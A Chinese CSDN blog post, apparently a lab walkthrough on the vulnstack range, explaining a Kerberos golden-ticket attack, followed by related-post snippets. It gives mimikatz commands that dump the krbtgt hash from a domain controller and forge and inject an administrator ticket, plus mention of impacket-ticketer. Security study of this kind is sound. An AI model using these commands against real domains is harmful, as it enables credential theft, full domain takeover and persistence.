域渗透-黄金票据

于 2024-10-07 21:47:34 发布
阅读量334 收藏 5
点赞数 3
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54030686/article/details/142744732
版权

首先先来解释一下域环境中Administrator和DC账户的区别,以下是来自于文心一言的解释

Administrator账户:本地计算机或域成员的最高权限账户,主要用于单台计算机的管理和维护,可以登录到域成员计算机。
DC账户(域管理员):域控制器上的账户,对域控制器和整个域拥有完全控制权,主要用于整个域的集中管理和维护。

也就是说Administrator账户是域环境中的最高权限用户账户,而DC账户只是域控制器上的机器用户,而域控制器上可以有几个管理员用户,可以对域成员,域主机进行修改。而Administrator恰好就是域控制器上的管理员用户,那么如果拿下来域控中的一台主机,而这台主机刚好使用的Administrator管理员用户登录的,那么直接导出当前用户票据,直接ptt/pth,可以拿下整个域主机权限,权限高就可以为所欲为吗?是的,权限高就可以为所欲为
由于DC权限限制,只有域管理员成员,才可以登录DC,那么一般的域渗透路径就是,找到域控,打下域控,使用域控管理员导出票据,对域内其他主机进行横向。

这里使用vulnstrsck 1进行演示
根据给出的文档来看,拿到主机权限后,先进行提权,再使用ms17-010对域内另外一台主机进行攻击,攻击域控则是使用ms14-068。
但实际上跳板机是以administrator用户登录的,提权之后,提取票据直接进行ptt/pth即可。
这里不做演示,只做后续的黄金票据利用,这里演示两种方法,mimikatz以及impacket-ticketer,当然了impacket-ticketer这玩意还是得mimikatz配合导入内存中,

由于这里使用的是vulnstrsck 1靶场,首先需要在域控上创建一个普通用户这里使用test,自定义密码后,在win7跳板机上使用test用户登录即可

由于黄金票据使用时krbtgt用户账户hash,所以直接在域控上导出票据,域控使用的是liukaifeng01用户登录,该用户也是域控管理员,所以可以直接导出即可,

mimikatz.exe "privilege:debug" "lsadump::lsa /patch" exit >1.txt

在1.txt中即可看到krbtgt hash
在这里插入图片描述
那么回到使用test普通用户登录的跳板机win7上,这里的owa.god.org是域控地址
在这里插入图片描述
导入黄金票据

 mimikatz.exe "kerberos::golden /user:administrator /domain:god.org /sid:S-1-5-21-2952760202-1353902439-2381784089 /krbtgt:58e91a5ac358d86513ab224312314061 /ptt" exit

再次访问,即可成功访问的域控目录

在这里插入图片描述
impacket-ticketer
首先用impacket-ticketer伪造黄金票据
在这里插入图片描述
会在当前目录下生成administrator.ccache文件,但是该文件格式,mimikatz无法利用
在这里插入图片描述
所以还需要impacket-ticketConverter转换为kribi格式文件,mimikatz才能导入内存在这里插入图片描述
在这里插入图片描述

天下是个小趴菜
关注
渗透-白银票据黄金票据的利用
orange777
02-23 3866
最近做了一些靶场渗透的实验,记录下一些关于白银票据黄金票据的问题。 0x01 白银票据的利用 1 环境信息 控DC 192.168.183.130 内主机win7 192.168.183.129 2 使用场景 在拿到一个普通的成员权限的时候,可以尝试使用ms14-068伪造一个票据,从而让我们的用户有管理员权限。 3 利用过程 说明:这里是用vulnstack4靶机笔记的实验环境,来演示一下利用过程 获取sid whoami /all 伪造票据 MS14-068.exe -u 用户名@
内网渗透--黄金票据
yc的博客
05-23 1793
渗透-----黄金票据的使用 前言 今天主要学习内容为黄金票据的制作,黄金票据主要是权限维持,因为经验少,所以一直不明白一个问题,就是在制作黄金票据时候需要KRBTGT的hash,KRBTGT的hash需要控权限,而且每张黄金票据制作后仅可维持十个小时,那么黄金票据的主要作用是什么?是hw时管理员突然改控密码,此时黄金票据可以维持权限、继续渗透嘛? Kerberos黄金票据是有效的TGT Kerberos票据,因为它是由Kerberos帐户(KRBTGT)加密和签名的。TGT仅用于向控制器上的KD
渗透--金银票据问题
Vdieoo的博客
10-30 1224
票据 伪造凭据,提升内普通用户权限 以admin用户登入任意一台内主机 收集信息 命令有:net config workstation,可以看到名为:cyberpeace。 nltest /dsgetdc:名,可以看到控主机名为:scene。 以admin权限运行mimikztz mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt 找...
渗透黄金票据
ClarkAlbert的博客
10-29 1586
渗透黄金票据前言:1.黄金票据的原理和条件(1)原理(2)条件2.黄金票据的局限性3.绕过黄金票据局限性4.黄金票据的特点5.黄金票据防御6.实践 前言: 在了解黄金票据前,首先要清楚keberos协议,目前在windows中采用的认证协议就是kerberos。(参考链接:https://blog.csdn.net/wy_97/article/details/87649262) 1.黄金票据的原理和条件 (1)原理 黄金票据伪造的是票据授予票据(TGT),TGT=krbtgt hash(session
内横向渗透-PTT票据传递之黄金票据 (Golden Ticket)
m0_62783065的博客
09-22 579
PTT票据传递之黄金票据 (Golden Ticket),介绍黄金票据的原理及其使用方法
内网渗透-(黄金票据和白银票据)详解(一)
duoba_an的博客
03-31 1901
在 Kerberos 认证中,最主要的问题是如何证明「你是你」的问题,如当一个 Client 去访问 Server 服务器上的某服务时,Server 如何判断 Client 是否有权限来访问自己主机上的服务,同时保证在这个过程中的通讯内容即使被拦截或篡改也不影响通讯的安全性,这正是 Kerberos 解决的问题。获取Client的sid,以及所在的组,再根据该服务的ACL,判断Client是否有访问服务的权限,到此完成整个认证流程(大多数服务并没有验证PAC这一步)。这个是启用PAC支持的扩展。
内网横向——渗透黄金票据复现
ytdd66的博客
04-03 1404
Kerberos是一种由MIT(麻省理工大学)提出的一种网络身份验证协议。它旨在通过使用密钥加密技术为客户端/服务器应用程序提供强身份验证。其中KDC服务默认会安装在一个控中,而Client和Server为内的用户或者是服务,如HTTP服务,SQL服务。在Kerberos中Client是否有权限访问Server端的服务由KDC发放的票据来决定。
黄金票据——渗透
include_voidmain的博客
03-14 672
0x01前言 黄金票据是伪造票据授予票据(TGT),也被称为认证票据。攻击者一旦拿到管权限的账号就可以伪造出黄金票据,逃过账号和密码的验证,即使修改管理员密码,攻击者依然能通过黄金票据进行访问。 0x02原理 kerberos认证中Client通过AS认证后,AS会给Client一个由Client的Master Key加密过的和TGT,Logon Session Key并不会保存在KDC中,krbtgt的NTLM Hash又是固定的,所以只要得到NTLM就能伪造TGT和Logon session key,
内网渗透——黄金票据与白银票据
来日可期的博客
10-11 3238
黄金票据(Golden Ticket):黄金票据指的是攻击者通过获取目标环境中控制器(Domain Controller)上的krbtgt帐户的散列值,然后使用散列值生成伪造的票据。这种伪造的票据具有极高的权限,并且不受密码更改的影响。拥有黄金票据相当于拥有内的最高权限,攻击者可以访问和控制所有内资源。 白银票据(Silver Ticket):白银票据是攻击者通过获取目标环境中某个服务帐户(Service Account)的散列值,并使用散列值生成伪造的票据。这种伪造的票据允许攻击者模拟该服务账户的
内网渗透--CS伪造黄金票据与白银票据
Armandhe的博客
06-24 3663
性感作者,在线翻车
AD渗透 黄金与白银票据攻击
m0_57221101的博客
04-12 815
过两天研究明白kerberos协议里每次发包中各个参数的含义之后,会发一个协议的详细解析,也许能帮助大家比较详细的理解这套协议。敬请期待 以下演示环境借用红日团队vulnstack2环境,感谢 工具 gentilkiwi/mimikatz: A little tool to play with Windows security (github.com) 也可以使用kali中帮你预编译好的,直接输入mimikatz就会告诉你在哪 黄金票据 原理 黄金票据攻击发生在我们知道中的tgt验证用户k
[渗透测试笔记] 49.渗透黄金票据和白银票据
H4ppyD0g的博客
03-17 4626
Kerberos认证协议 《信息系统安全概论》书中对kerberos协议流程做了简化,如下所示 在此用下图做说明 KDC(密钥分发中心)包含身份认证服务器和服务审批服务器(用于票据授权服务TGS) DC是控制器;AD是活动目录。 DC中有一个特殊用户叫做:krbtgt,它是一个无法登录的账户,是在创建时系统自动创建的,在整个kerberos认证中会多次用到它的Hash值去做验证。 AD会维护一个Account Database(账户数据库). 它存储了中所有用户的密码Hash和白名单。只有账户密码
红队内网攻防渗透:内网渗透之内网对抗:权限维持篇&内网AD&Kerberos点&黄金票据&白银票据&钻石票据&蓝宝石票据
HACKONE的博客
06-25 323
蓝宝石票据与钻石票据类似,票据不是伪造的,而是通过请求后获得的合法票据。在蓝宝石票据中,高权限用户PAC是通过S4U2Self+U2U获得的,然后该PAC会替换原来的PAC,由于该票据是完全合法元素组合起来的,所以是最难检测的票据。白银票据是伪造的 Kerberos Ticket Grant Service (TGS) 票证,银票仅允许攻击者伪造特定服务的票证授予服务 (TGS) 票据。白银票据所需的利用条件和黄金票据是相同的,只是秘钥换成了对应服务的机器账户 Hash(尾部带$的均为机器账户)
如何安全地大规模部署 GenAI 应用程序
最新发布
网络研究观
10-06 689
将生成式人工智能融入到你的商业模式中,既会带来新的风险,也会带来新的回报。以下是如何应对这些风险。
前置机、跳板机、堡垒机:安全运维领的“黄金三角”
拉格朗日的学习笔记
09-28 1081
为了确保数据的安全性、提升系统的可靠性和性能,企业需要采用一系列先进的设备和系统来构建坚固的IT防御体系。其中,前置机、跳板机和堡垒机作为关键组件,各自在网络安全和运维管理中发挥着不可替代的作用。
实施威胁暴露管理、降低网络风险暴露的最佳实践
网络研究观
10-04 1008
随着传统漏洞管理的发展,TEM 解决了因攻击面扩大和安全工具分散而产生的巨大风险。
从《GTA5》的反外挂斗争看网络安全的重要性
@云安全小杜
09-26 1394
本文将探讨《GTA5》在对抗外挂过程中遇到的挑战,特别是当游戏开发者试图增强游戏安全性时所遭受的DDoS攻击,并从中提炼出对于网络安全的一些启示。然而,随着游戏人气的增长,一些不法分子开始利用技术手段制作并销售外挂程序,这些程序可以让使用者在游戏中获得不公平的优势,从而破坏了游戏环境。请注意,以上内容是基于假设的情景编写的技术分析文章,实际案例可能涉及更多的细节和技术层面的问题。《GTA5》与外挂之间的斗争提醒我们,在享受数字世界带来的便利的同时,也需要时刻警惕潜在的安全风险,并积极采取措施加以防范。
Web安全 - 构建全面的业务安全保护防御体系
小工匠
10-03 2167
业务安全是公司为了保护其业务流程和用户增长而制定的防护措施,主要应对的是黑产(黑色产业)的攻击。相比传统的基础安全,业务安全的特点更加复杂,主要体现在两个方面:攻击者的产业化和资源对抗。
内网渗透黄金票据和白银票据的区别
03-31
黄金票据和白银票据是内网渗透中常见的两种攻击手段,它们的主要区别在于: 1. 黄金票据通常是使用被攻破的控制器的管理员账户来获取的,因此具有更高的权限,可以访问中的所有资源和计算机。而白银票据则是使用已经被攻破的计算机的本地管理员账户来获取的,权限相对较低。 2. 黄金票据通常是用于攻击活动目录服务(Active Directory)中的控制器,因为它可以让攻击者在控制器上执行任意操作,包括创建新的账户、修改密码、添加权限等。而白银票据则更适用于攻击普通的计算机,可以帮助攻击者获取更高的权限。 综上所述,黄金票据和白银票据在内网渗透中各具特点,攻击者需要根据具体情况选择使用哪种票据来进行攻击。同时,企业也应该采取相应的防御措施,如加强控制器的安全性、限制管理员权限等,以避免遭受此类攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值